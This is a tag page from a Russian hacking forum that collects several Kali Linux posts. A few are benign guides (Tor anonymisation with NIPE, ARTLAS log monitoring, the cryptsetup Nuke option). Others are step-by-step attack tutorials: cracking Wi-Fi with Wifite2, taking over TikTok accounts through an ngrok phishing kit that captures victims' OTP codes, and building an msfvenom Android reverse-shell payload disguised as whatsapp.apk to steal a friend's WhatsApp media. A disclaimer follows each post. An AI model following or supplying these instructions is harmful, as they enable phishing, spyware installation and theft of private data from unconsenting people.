Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
Search the Community
Showing results for tags 'kali linux'.
-
Приветствую, хакеры! Анонимность – это очень хороший способ скрыть себя от всех видов слежки. В этой статье я познакомлю вас с инструментом NIPE, который позволяет сделать Kali Linux анонимным. Многие для улучшения анонимность используют VPN. Бесплатные VPN для этого совершенно непригодны, а платные могут сохранять логи, что может сыграть против вас. В этом плане лучше использовать TOR. Можно использовать Tor в качестве шлюза по умолчанию. Тогда, весь трафик на нашем компьютере будет передаваться через сеть Tor, и отследить нас будет очень сложно. Мы можем сделать это вручную, но ручная настройка отнимет много времени и сил. Куда легче использовать инструменты, которые помогут автоматизируют эту задачу. NIPE — неплохой инструмент для анонимизации всего трафика в Kali Linux. Данный perl-скрипт позволяет направлять весь трафик с компьютера в сеть Tor, через которую можно анонимно пользоваться интернетом, не беспокоясь о том, что нас могут отследить. Установка NIPE на Kali Linux Начнем с клонирования репозитория с GitHub: git clone https://github.com/htrgouvea/nipe Затем переходим в каталог NIPE: cd nipe Теперь установим библиотеки и зависимости: sudo cpan install Try::Tiny Config::Simple JSON Для новичков cpan может показаться странной командой, однако cpan помогает устанавливать пакеты или модули для Perl. После этого мы можем установить Perl-скрипт NIPE: sudo perl nipe.pl install После установки появится сообщение о необходимости перезапуска некоторых служб. Соглашаемся нажав на «TAB» и «OK», затем ENTER. На этом процесс установки завершен. Использование NIPE на Kali Linux Прежде всего, необходимо проверить работу NIPE: sudo perl nipe.pl status NIPE по умолчанию отключен. Запустим его следующей командой: sudo perl nipe.pl start Команды службы NIPE запущены. Снова проверим статус: sudo perl nipe.pl status Теперь необходимо проверить наш IP. Заходим на сайт dnsleaktest, чтобы убедиться, что наш оригинальный IP-адрес скрыт. Если анонимность больше не нужна, тогда можно отключить шлюз Tor: sudo perl nipe.pl stop После применения вышеуказанной команды NIPE перестанет работать. NIPE делает сеть Tor нашим шлюзом по умолчанию. Таким образом, мы можем анонимизировать всю систему Kali Linux. Взломать Tor практически невозможно, но, как мы знаем, теоретически возможно все. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье я хочу рассказать вам о том, как взломать Wi-Fi при помощи Kali Linux. Для начала взлома вам понадобится сетевой Wi-Fi адаптер, который имеет поддержку режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Лучше всего использовать данный дистрибутив на виртуальной машине или же прямо на компьютере, который имеет обновление загрузочной записи и возможность выбора операционной системы. По сути, Wifite2 можно установить в любом другом дистрибутиве, но лучше всего он будет работать если у вас Kali Linux, так как он является наиболее распространенным. При условии, что Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Погнали! 1. Для того, чтобы установить Wifite2, в терминале введите команды, показанные ниже, для клонирования репозитория и запуска инсталляции: git clone https://github.com/derv82/wifite2.git cd wifite2 ls sudo python setup.py install 2. Для запуска используем следующую команду: ./Wifite.py Для того, чтобы получить подробную информацию по использованию введите команду wifite -h Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье хочу рассказать о том каким образом хакеры могут без труда взламывать Wi-Fi при помощи Kali Linux. Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Рекомендую установить этот дистрибутив на виртуальной машине или прямо на компьютере с обновлением загрузочной записи и возможностью выбора операционной системы. Если Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Для этого введите в терминале команды, показанные ниже, для клонирования репозитория и запуска инсталляции: $ git clone https://github.com/derv82/wifite2.git $ cd wifite2 $ ls $ sudo python setup.py install Запуск $ ./Wifite.py Теперь введите команду wifite -h для подробной информации по использованиюю. С помощью такой программы, возможно взламывать практически любую сеть, поэтому рекомендую ее к использованию. Это одна из самых эффективных и простых в освоении утилит. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам об очень полезном инструменте для Kali Linux, а именно про такую утилиту как ARTLAS. ARTLAS - Это утилита для анализа логов Apache в реальном времени. Принцип работы построен на 10 важнейших уязвимостях по классификации OWASP. Данный инструмент выявляет практически все возможные попытки эксплуатации ваших веб-приложений и способен уведомить вас напрямую через Telegram, Zabbix или Syslog/SIEM. Поддерживаемые веб-сервера: Apache, Apache vHost. Установка: 1. git clone https://github.com/mthbernardes/ARTLAS 2. cd ARTLAS/ 3. sudo pip2 install -r requirements.txt Необходимо отредактировать файл artlas.py. Для этого откройте его и выполните следующие действия: 1. gedit artlas.py 2. Найдите там строку: "http://dev.itratos.de/projects/php-ids/repository/raw/trunk/lib/IDS/default_filter.json" 3. Замените её на: "https://raw.githubusercontent.com/PHPIDS/PHPIDS/master/lib/IDS/default_filter.json" 4. Сохраните и закройте файл. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Если при установки Kali Linux на персональное устройство Вы использовали опцию шифрования системного раздела, то при каждом запуске Kali требует от ваш мастер-ключ, который позволяет загрузится системе, и полностью расшифровать системный раздел. Весь процесс осуществляется с помощью системной утилиты под названием cryptsetup. Давным давно в Kali Linux была добавлена опция Nuke, которая служит своеобразным патчем для cryptsetup. С помощью данного патча Вы можете создал специальный пароль, при вводе которого самоуничтожаются ключевые слоты, из-за чего все зашифрованные данные станут недоступными для каких-либо взаимодействий. Для того, чтобы включить опцию Nuke, выполняем следующую команду: cryptsetup luksAddNuke Например, если мой зашифрованный раздел называется /dev/sda3, то команда будет выглядеть следующим образом: cryptsetup luksAddNuke /dev/sda3 После выполнения данной команды cryptsetup сначала предложит ввести пароль, который используется для зашифрованного раздела, а после предложит ввести пароль для самоуничтожения. Теперь если при запуске системы мы введем пароль для самоуничтожения, то cryptsetup уничтожит ключевые слоты, чтобы никакой злоумышленник не смог получить доступ к зашифрованным данным, даже если он выпытал у нас мастер-ключ от защищенного раздела. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Способы взлома вашего аккаунта Tiktok Есть несколько способов взломать учетные записи Tiktok, но взлом учетных записей Tiktok совсем не прост, большинство из нас думают, что мы можем взломать учетную запись tiktok с помощью kali linux, но мы также взламываем ее с помощью Android Когда дело доходит до взлома учетных записей Tiktok, люди говорят, что вы должны иметь свой смартфон жертвы в руке, чтобы взломать его Да, это тоже возможно, вы даже можете взломать, не прикасаясь к устройству жертвы Есть в основном два способа сделать это, один-когда у вас есть телефон жертвы, а другой-когда у вас его нет Как взломать аккаунты tik tok Давайте посмотрим, как мы сможем взломать Tiktok в 2020 году, В наших предыдущих постах я рассказал вам, как взломать Facebook с помощью Termux, а также рассказал вам об установке продвинутых фишинговых инструментов в Termux, если вы пропустили, то можете прочитать, перейдя по ссылкам ниже Шаги по взлому аккаунтов Tiktok В этом уроке мы используем Termux Итак, сначала установите приложение Termux из Playstore Затем откройте Termux и выполните следующие действия, чтобы установить Advanced Phishing Tool в Termux После установки Termux введите эту команду termux-настройка-хранение Затем набрать pkg install git Затем git клон https://github.com/Ignitetch/AdvPhishing.git Затем cd AdvPhishing & & ls Затем chmod +x start.sh И chmod +x An-AdvPhishing.sh Теперь наберите ./start.sh Теперь вам нужно ввести y для yes, тогда он попросит Ngrok Token, goto http://ngrok.io затем зарегистрируйтесь там, скопируйте и вставьте код токена в Termux Теперь ты готова, просто набери ./An-AdvPhishing.sh Затем введите Y , затем вы должны включить мобильную точку доступа, Вы получите такой интерфейс, теперь вам нужно набрать 1 и нажать enter для Tiktok Теперь вы получите ссылку, как показано на скриншоте Отправьте ссылку жертве, и в то же время вы должны Гото https://tikok.com/login Если вы жертва вводите логин номер, Используйте этот номер для входа в систему, и OTP будет отправлен вашей жертве Если ваша жертва вводит учетные данные OTP на поддельном сайте, то вы получите этот OTP на Termux, можете использовать их для входа в свою учетную запись Это все, что вы можете получить доступ к их учетной записи, надеюсь, вы узнали, как взламывают аккаунт tiktok Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци
-
Привет, хакеры! Сегодня я расскажу вам, как вы можете взломать WhatsApp любого своего друга и увидеть все данные его WhatsApp. Мы проделаем весь этот процесс в нашей системе Linux, для чего нам нужно сначала скопировать некоторые команды и создайте полезную нагрузку, которую вы поместите на мобильный телефон вашего друга, а затем вы сможете украсть все данные из телефона цели. Kali Linux - как сделать полезную нагрузку msfvenom -p android/meterpreter/reverse_tcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk Чтобы создать полезную нагрузку, вам сначала нужно ввести несколько команд, которые показаны в раздели команды и на скринах. В хосте L, вы должны ввести IP-адрес своего машины и в порт L вы можете ввести любой номер порта. После вставки команд ваша полезная нагрузка будет создана, и вы увидите интерфейс, выделенные цифры, размер вашей полезной нагрузки. Теперь нам нужно поместить полезную нагрузку в телефон нашего друга и установить его. После установки полезной нагрузки ее необходимо открыть. Kali Linux - открытие полезной нагрузки. msfconsole После этого, чтобы управлять полезной нагрузкой на вашем компьютере, вы должны открыть инструмент с именем (msfconsole) из который вы можете контролировать свою полезную нагрузку. Когда вы введете имя клана в свой терминал, ваш инструмент запустится. Kali Linux - заполнение информации для полезной нагрузке. use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (YOUR IP) exploit Здесь вы должны ввести IP-адрес вашей машины на хосте L, а затем написать команду эксплойта и нажмите кнопку ввода, и вы увидите, что мой инструмент запущен и готов подключиться к полезной нагрузке. Теперь вы можете видеть, что мой инструмент связан с полезной нагрузкой. Если вы не подключаетесь к полезной нагрузке, вам придется открыть ее еще раз. И тогда перед вами откроется интерфейс. Kali Linux - переходим в мобильную root папку cd / ls -l Здесь вы были подключены к телефону, теперь вам нужно взять данные его WhatsApp из его телефона, для чего сначала нужно зайти в корневые файлы его телефона, команды которые указаны на скрине. Kali Linux – переход в SD-карту. cd sdcard ls -l Придя сюда, вы должны перейти на его SD-карту, где сохранены данные каждого приложения. Перейдя в каталог SD-карты, вы увидите приложения установленные на телефоне. Kali Linux – Переход в папку WhatsApp. cd WhatsApp ls -l Нужно зайти в папку с WhatsApp и взять оттуда данные. cd Media ls -l После входа в WhatsApp перед вами откроются имена файлов и папок, где вам нужно перейдите в папку мультимедиа. После того, как вы зайдете в папку с мультимедиа, перед вами откроются данные WhatsApp вашего друга, теперь вы можете скачать что угодно отсюда. cd WhatsApp \ Images ls -l download (YOUR FILE NAME) После того, как изображение окажется в папке, вы должны написать имя файла, который вы хотите загрузить, после скачать и нажать кнопку ввода, и вы увидите, что мой файл загружен. Тогда вы сможете увидеть то, что хотите. Используя этот метод, вы можете загружать медиа, документы и т.д. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.